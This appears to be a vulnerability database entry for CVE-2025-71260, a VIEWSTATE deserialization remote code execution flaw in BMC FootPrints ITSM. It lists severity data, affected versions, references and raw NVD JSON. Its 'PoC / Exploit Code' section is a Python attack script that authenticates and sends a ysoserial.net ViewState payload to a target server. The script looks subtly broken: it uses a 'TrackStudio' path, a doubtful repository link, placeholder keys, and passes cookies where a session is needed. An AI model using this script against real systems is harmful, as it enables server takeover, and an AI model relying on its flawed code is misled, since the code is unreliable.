CVE-2025-71260

Description

BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a deserialization of untrusted data vulnerability in the ASP.NET servlet's VIEWSTATE handling that allows authenticated attackers to execute arbitrary code. Attackers can supply crafted serialized objects to the VIEWSTATE parameter to achieve remote code execution and fully compromise the application. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:* - VULNERABLE

BMC FootPrints ITSM 20.20.02

BMC FootPrints ITSM 20.20.03.002

BMC FootPrints ITSM 20.21.01.001

BMC FootPrints ITSM 20.21.02.002

BMC FootPrints ITSM 20.22.01

BMC FootPrints ITSM 20.22.01.001

BMC FootPrints ITSM 20.23.01

BMC FootPrints ITSM 20.23.01.002

BMC FootPrints ITSM 20.24.01

BMC FootPrints ITSM <= 20.24.01.001

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-71260 PoC - VIEWSTATE Deserialization RCE
# Generate malicious VIEWSTATE using ysoserial.net
# ysoserial.net: https://github.com/icksoserial/ysoserial

import subprocess
import requests
import re

TARGET_URL = "http://target.com/TrackStudio/"
USERNAME = "attacker"
PASSWORD = "password123"

# Generate VIEWSTATE payload using ysoserial.net
# Using TypeConfuseDelegate gadget for RCE
PAYLOAD_CMD = "calc.exe"

def generate_viewstate_payload():
    """Generate malicious VIEWSTATE using ysoserial.net"""
    cmd = [
        "ysoserial.exe",
        "-p", "ViewState",
        "-g", "TypeConfuseDelegate",
        "-c", PAYLOAD_CMD,
        "--apppath", "/TrackStudio/",
        "--decryptkey", "AutoGenerated"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.stdout.strip()

def authenticate():
    """Login to obtain session cookie"""
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}Login.aspx", data=login_data)
    return session.cookies.get_dict()

def exploit(session, malicious_viewstate):
    """Send malicious VIEWSTATE to trigger RCE"""
    exploit_data = {
        "__VIEWSTATE": malicious_viewstate,
        "__VIEWSTATEGENERATOR": "AutoGenerated"
    }
    response = session.post(f"{TARGET_URL}Main.aspx", data=exploit_data)
    return response.status_code == 200

# Main execution
payload = generate_viewstate_payload()
session_cookies = authenticate()
if exploit(session_cookies, payload):
    print("Exploit sent successfully")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71260
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71260
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71260/
[4] VulDB https://vuldb.com/cve/CVE-2025-71260
[5] https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/
[6] https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
[7] https://www.vulncheck.com/advisories/bmc-footprints-itsm-viewstate-deserialization-rce

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71260", "sourceIdentifier": "[email protected]", "published": "2026-03-19T14:16:13.583", "lastModified": "2026-04-22T17:29:42.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a deserialization of untrusted data vulnerability in the ASP.NET servlet's VIEWSTATE handling that allows authenticated attackers to execute arbitrary code. Attackers can supply crafted serialized objects to the VIEWSTATE parameter to achieve remote code execution and fully compromise the application. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01."}, {"lang": "es", "value": "Las versiones 20.20.02 a 20.24.01.001 de BMC FootPrints ITSM contienen una vulnerabilidad de deserialización de datos no confiables en el manejo del VIEWSTATE del servlet de ASP.NET que permite a atacantes autenticados ejecutar código arbitrario. Los atacantes pueden suministrar objetos serializados manipulados al parámetro VIEWSTATE para lograr la ejecución remota de código y comprometer completamente la aplicación. Los siguientes hotfixes remedian la vulnerabilidad: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, y 20.24.01."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.20.02", "versionEndIncluding": "20.24.01.001", "matchCriteriaId": "847E5686-7CB0-4A4F-952D-E3D9D2CF7BE8"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/bmc-footprints-itsm-viewstate-deserialization-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}